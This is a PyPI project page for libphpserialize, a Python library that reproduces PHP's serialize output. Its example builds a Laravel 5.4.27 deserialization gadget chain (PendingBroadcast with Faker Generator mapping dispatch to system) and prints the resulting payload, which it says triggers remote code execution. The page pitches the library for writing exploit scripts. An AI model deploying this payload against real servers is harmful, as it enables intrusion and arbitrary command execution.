A port of PHP's serialize function, in pure python

Navigation

Verified details

These details have been verified by PyPI
Maintainers
Avatar for frankli0324 from gravatar.com frankli0324

Unverified details

These details have not been verified by PyPI
Project links
Meta
  • License: MIT License
  • Author: Frank
  • Requires: Python >=3.7
Classifiers

Project description

libphpserialize

A port of PHP's serialize function, in pure python

Features

  • serialize objects directly from python objects
  • nested objects
  • namespacing
  • variable Access Modifiers (public, private, protected)

Example

from phpserialize import serialize
from phpserialize.decorators import namespace
import requests


@namespace('Faker')
class Generator:
    protected_formatters = {'dispatch': 'system'}


@namespace('Illuminate\Broadcasting')
class PendingBroadcast:
    protected_event = 'ls'
    protected_events = Generator()


print(serialize(PendingBroadcast()))

with above code, you'll get:

O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:15:"Faker\Generator":1:{s:13:"*formatters";a:1:{s:8:"dispatch";s:6:"system";}}s:8:"*event";s:2:"ls";}

which triggers an RCE vulnerability in Laravel 5.4.27

nice when you're writing an exploit script for others to read

Important:

  • the code is written and tested under python 3.7+
  • decimal serialization doesn't work the same as PHP does, yet

TODO

  • recursive objects support
  • reimplement decimal precision calculating algorithm from php engine

Project details

Verified details

These details have been verified by PyPI
Maintainers
Avatar for frankli0324 from gravatar.com frankli0324

Unverified details

These details have not been verified by PyPI
Project links
Meta
  • License: MIT License
  • Author: Frank
  • Requires: Python >=3.7
Classifiers

Release history Release notifications | RSS feed

0.0.8

0.0.7

0.0.6

0.0.5

0.0.4

0.0.3

0.0.2

0.0.1

0.0.1b5 pre-release

0.0.1b4 pre-release

0.0.1b3 pre-release

This version

0.0.1b2 pre-release

0.0.1b0 pre-release

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

libphpserialize-0.0.1b2.tar.gz (3.0 kB view details)

Uploaded Source

Built Distribution

libphpserialize-0.0.1b2-py3-none-any.whl (3.7 kB view details)

Uploaded Python 3

File details

Details for the file libphpserialize-0.0.1b2.tar.gz.

File metadata

  • Download URL: libphpserialize-0.0.1b2.tar.gz
  • Upload date:
  • Size: 3.0 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.2.0 pkginfo/1.5.0.1 requests/2.24.0 setuptools/46.0.0 requests-toolbelt/0.9.1 tqdm/4.47.0 CPython/3.8.3

File hashes

Hashes for libphpserialize-0.0.1b2.tar.gz
Algorithm Hash digest
SHA256 1ff9b7e9d0f9cdea606b710a1c82c6a146c77906b0436971dfec69c3676bc9e7
MD5 db81c546b2655a31f5d1685d6b547e3f
BLAKE2b-256 0d9a87a0935170b1fe5ea90ee66bcc5cdc55f6080beebfddd092b837e6056e48

See more details on using hashes here.

File details

Details for the file libphpserialize-0.0.1b2-py3-none-any.whl.

File metadata

  • Download URL: libphpserialize-0.0.1b2-py3-none-any.whl
  • Upload date:
  • Size: 3.7 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.2.0 pkginfo/1.5.0.1 requests/2.24.0 setuptools/46.0.0 requests-toolbelt/0.9.1 tqdm/4.47.0 CPython/3.8.3

File hashes

Hashes for libphpserialize-0.0.1b2-py3-none-any.whl
Algorithm Hash digest
SHA256 f1121158da843d7a45fc2e1e58fa6421176b58877d0e54e733ba708d9166fe7e
MD5 4bf47219039ea742c9a1ee8f1002e66f
BLAKE2b-256 c18e332aefaf03b6eccd11a58ec7ca9b68a0795a6f247f4f018c204893ccdd75

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page